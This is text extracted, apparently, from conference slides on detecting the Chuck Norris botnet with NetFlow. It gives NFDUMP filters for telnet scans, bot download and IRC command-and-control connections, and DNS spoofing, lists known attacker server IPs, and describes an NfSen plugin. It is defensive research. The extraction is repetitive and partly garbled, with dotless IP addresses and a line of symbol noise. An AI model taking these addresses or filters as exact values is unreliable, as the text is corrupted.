Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
